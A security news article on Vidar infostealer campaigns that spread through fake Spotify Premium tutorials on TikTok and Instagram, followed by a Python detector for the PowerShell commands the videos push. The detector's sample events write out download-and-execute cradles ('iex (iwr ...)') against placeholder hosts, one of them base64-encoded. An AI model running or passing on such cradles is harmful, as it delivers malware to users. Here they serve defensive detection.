PROBABLYPWNED
Malware | June 14, 2026 | 3 min read

Vidar Infostealer Spreads via Fake TikTok and Instagram Tutorials

Cybercriminals are using TikTok and Instagram Reels videos to distribute Vidar malware through fake software tutorials. One campaign accumulated over 100,000 views promoting 'free Spotify Premium' hacks.

James Rivera

Cybercriminals have adapted their malware distribution tactics for the short-video era, using TikTok and Instagram Reels to spread Vidar infostealer through fake software tutorials. Research published by ReversingLabs this week documents two distinct campaigns that leverage social media's algorithmic amplification to reach victims at scale.

The campaigns target users searching for free access to premium software, particularly Spotify Premium. Attackers create polished instructional videos complete with Windows-style branding and professional voiceovers, instructing viewers to paste commands into PowerShell that ultimately download and execute Vidar. One tutorial accumulated over 100,000 views with thousands of saves and shares—metrics that boost algorithmic visibility and expand reach.

Campaign Structure

ReversingLabs identified two parallel operations with slightly different approaches.

The first campaign relies on direct tutorials. Accounts using names like "windows.tips" and "windows.insights" post videos claiming to unlock paid software for free. The videos walk viewers through opening PowerShell and executing commands that supposedly activate premium features. Instead, the commands download Vidar payloads.

The second campaign builds engagement first. Videos promote free premium access but withhold instructions, encouraging comments and follows. Users are directed to external sites offering "free software, games and AI tools," often requiring survey completion and redirect chains before reaching download links.

Both approaches exploit the trust users place in seemingly helpful content creators. As researchers noted, "a non-technical user does not know any better, and may assume it is legitimate."

What Vidar Steals

Vidar is a well-established infostealer sold as a service for a $300 lifetime license. Once installed, it harvests a broad range of sensitive data:

  • Saved browser passwords and autofill data
  • Browser cookies and session tokens
  • Cryptocurrency wallet credentials
  • Two-factor authentication app data
  • TOR browser data
  • Financial and payment information

Everything collected is exfiltrated to attacker-controlled servers. For organizations concerned about credential theft, this campaign represents another vector for initial access—employees who execute these payloads on personal devices may have corporate credentials stored in their browsers.

This attack chain differs from traditional phishing approaches but achieves the same goal: social engineering victims into executing malicious code. The visual format and entertainment context make the deception harder to recognize.

Platform Response

ReversingLabs reported the malicious accounts to Instagram. The platform declined to take action, leaving the campaigns active at publication time.

This mirrors ongoing challenges with social media content moderation and malware distribution. Short-video platforms optimize for engagement rather than security review, and the volume of content makes comprehensive screening impractical. Similar tactics have appeared on other platforms—we covered ClickFix campaigns targeting Ghost CMS sites earlier this month that used comparable social engineering approaches.

Recommended Actions

Users should approach "free premium software" tutorials with extreme skepticism. Any video instructing viewers to paste commands into a terminal or PowerShell is almost certainly malicious. Legitimate software companies don't distribute premium access through TikTok tutorials.

For organizations, this campaign reinforces the need for:

  1. User awareness training covering social engineering on video platforms, not just email phishing
  2. Endpoint detection capable of identifying infostealer behavior patterns
  3. Password manager adoption to reduce credential exposure in browser storage
  4. Credential monitoring to detect when employee credentials appear in infostealer logs
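The second item above is where the PowerShell step in these campaigns becomes detectable. As an added example (not code from the article or from ReversingLabs), the Python below triages constructed Sysmon-style process-creation events and flags the pasted download-and-execute pattern; the field names, the list of interactive parent processes and the sample command lines are assumptions.

```python
import base64
import re

# Heuristics for the chain the article describes: a user pastes a PowerShell command that
# fetches a remote payload and runs it. Fields mimic Sysmon Event ID 1 (process creation).
DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|\birm\b|\bcurl\b|downloadstring|downloadfile|net\.webclient", re.I)
EXECUTE = re.compile(r"invoke-expression|\biex\b|start-process|\bsaps\b|\|\s*&", re.I)
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe", "conhost.exe"}

def decode_encoded_command(cmd):
    """Return the script behind -EncodedCommand/-enc/-e, or '' if the flag is absent or invalid."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmd, re.I)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else ""
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze_event(event):
    """Return a finding if the event looks like a pasted download-and-execute cradle, else None."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = cmd + "\n" + decoded  # inspect both the raw and the decoded command
    if not (DOWNLOAD.search(text) and EXECUTE.search(text)):
        return None  # a download alone or an IEX alone is routine admin noise; the cradle needs both
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    severity = "high" if parent in INTERACTIVE_PARENTS else "medium"  # pasted by a user, not run by a service
    reasons = ["remote download", "in-memory execution"] + (["encoded command"] if decoded else [])
    if severity == "high":
        reasons.append("interactive parent " + parent)
    return {"pid": event["ProcessId"], "severity": severity, "reasons": reasons}

def analyze_events(events):
    return [hit for hit in map(analyze_event, events) if hit]

# Constructed sample events, not real telemetry; hosts use the reserved .invalid TLD.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode("iex (iwr http://c2.example.invalid/a)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe iex (iwr 'http://activate.example.invalid/premium.ps1' -UseBasicParsing)"},
    {"ProcessId": 4133, "Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},  # benign scheduled task
    {"ProcessId": 4150, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"ProcessId": 4161, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"},
]
```

Only the two cradles (pids 4120 and 4150) are flagged; the scheduled script and the plain file download are left alone, which keeps the rule usable on noisy endpoints.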

Vidar infections often serve as the entry point for larger compromises. Stolen credentials enable account takeover, which can escalate to corporate network access, data theft, and ransomware deployment. Treat any confirmed Vidar infection as a potential precursor to broader compromise.
